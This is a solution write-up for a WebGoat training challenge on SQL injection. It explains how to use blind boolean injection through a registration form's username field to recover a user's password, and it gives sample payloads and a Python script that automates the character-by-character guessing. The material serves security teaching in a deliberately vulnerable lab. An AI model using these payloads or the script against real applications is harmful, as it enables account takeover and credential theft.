We now explained the basic steps involved in an SQL injection. In this assignment you will need to combine all the things we explained in the SQL lessons.

Goal: Can you login as Tom?

Have fun!

Solution

💡 Look at the different response you receive from the server 💡 The vulnerability is on the register form 💡 The vulnerable field is the username field of the register form. 💡 Use tooling to automate this attack 💡 The table name is randomized at each start of WebGoat, try to figure out the name first. 💡 Change the password through an UPDATE Statement.

As specified in the hints, it is possible to change the password using an UPDATE. It is also possible to find the original password as we will see in the proposed solution.

• The Login form does not appear to provide any useful outputs from a variety of inputs, but the Register form allows us to check whether a username already exists.

• If we try to register with the following username: tom' AND '1'='1 we find that the username is taken.

• We can use this as an oracle and check what Tom's password is one at a time.

• Fortunately, the table we are seeking is named password (guessing), so we can attempt to register with the following username: tom' AND substring(password,1,1)='t

• The response states the username already exists, we know that t is the first character of Tom's password.

• By fuzzing for the remaining characters, we can determine that Tom's password is thisisasecretfortomonly.

This challenge can be a good exercise to practice scripting. Below, a small example of Python code to find the answer:

import json  
import requests  
  
def sql_injection_advance_5():  
     alphabet_index = 0  
     alphabet = 'abcdefghijklmnopqrstuvwxyz'  
     password_index = 0  
     password = ''  
  
     headers = {  
        'Cookie': COOKIE,  
     }  
  
     while True:  
         payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])  
  
         data = {  
             'username_reg': payload,  
             'email_reg': 'a@a',  
             'password_reg': 'a',  
             'confirm_password_reg': 'a'  
         }  
  
         r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
  
         try:  
             response = json.loads(r.text)  
         except:  
             print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
             return  
  
         if "already exists please try to register with a different username" not in response['feedback']:  
             alphabet_index += 1  
             if alphabet_index > len(alphabet) - 1:  
                 return  
         else:  
             password += alphabet[alphabet_index]  
             print(password)  
             alphabet_index = 0  
             password_index += 1  
  
sql_injection_advance_5()